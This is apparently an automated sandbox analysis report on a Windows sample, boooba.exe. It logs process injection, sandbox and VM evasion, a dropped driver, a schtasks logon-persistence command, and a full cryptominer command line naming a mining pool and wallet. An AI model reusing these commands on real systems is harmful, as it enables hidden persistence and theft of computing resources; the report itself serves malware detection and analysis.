Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\nslookup.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Windows\System32\nslookup.exe	System information queried: FirmwareTableInformation			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: nslookup.exe, 0000000D.00000002.2902391217.0000019A4A588000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\conhost.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

Jump to dropped file

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\boooba.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 15759250000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 13CA14E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1E311770000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 29965300000 protect: page execute and read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\boooba.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 59250000	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Thread created: C:\Windows\System32\conhost.exe EIP: A14E0000	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 11770000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 65300000	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtCreateThreadEx: Direct from: 0x401A17	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtWriteVirtualMemory: Direct from: 0x401D57	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtProtectVirtualMemory: Direct from: 0x401DD7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtClose: Direct from: 0x401CD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtAllocateVirtualMemory: Direct from: 0x401D97	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\conhost.exe	Thread register set: target process: 6288			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread register set: target process: 5480			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\boooba.exe	Memory written: C:\Windows\System32\conhost.exe base: 15759250000	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Memory written: C:\Windows\System32\conhost.exe base: 13CA14E0000	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Memory written: C:\Windows\System32\conhost.exe base: 1E311770000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140001000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140367000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 1404A0000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140753000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140775000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140776000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140777000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140779000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077B000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077C000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077D000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 59CFC77010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory written: C:\Windows\System32\conhost.exe base: 29965300000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140001000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140367000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 1404A0000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140753000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140775000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140776000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140777000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140779000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077B000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077C000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077D000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 26087A5010	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\boooba.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\nslookup.exe

Code function: 12_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_000000014031010C

ID:	1545299
Product:	CloudBasic
Start time:	11:41:06
Start date:	30.10.2024
Sample:	boooba.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	ef9e6a4bab77a1e5ed51669eabeba31d
SHA1:	43b67b32d2fd462f0cb9277ed974d63a5575fc8c
SHA256:	ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
Filetype:	Win64 Executable (generic) (12005/4) 74.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log	ASCII text, with CRLF line terminators	7155C0B26CEC4BA9E8198691F0343F69	0C2D3811CBDA0C349203F9AAAEEF47E6DB4C0FEF	59691880D1C39E4698FA89EFDA67A8EA171A039B0F6FC332EBE911F7EE790E23
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys	PE32+ executable (native) x86-64, for MS Windows	0C0195C48B6B8582FA6F6373032118DA	D25340AE8E92A6D29F599FEF426A2BC1B5217299	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	6A7E9885A2D01DF564B46F8F27258853	2F57231A188226669FF74CF886A09572ED69025E	6BA3E42C8FA7DABE994E2793F369BAC914EA2E4949174FC2A0EFE4CBFEBE8171
C:\Users\user\IOAshdohSha.exe	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	EF9E6A4BAB77A1E5ED51669EABEBA31D	43B67B32D2FD462F0CB9277ED974D63A5575FC8C	AB41E347FEC54AF86EF8EDD98C695A7E856A93A30CD07A89D7669896B419B92B
C:\Users\user\IOAshdohSha.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

Windows Analysis Report
boooba.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Bitcoin Miner

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report boooba.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Bitcoin Miner

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report
boooba.exe

Malware Threat Intel
Provided by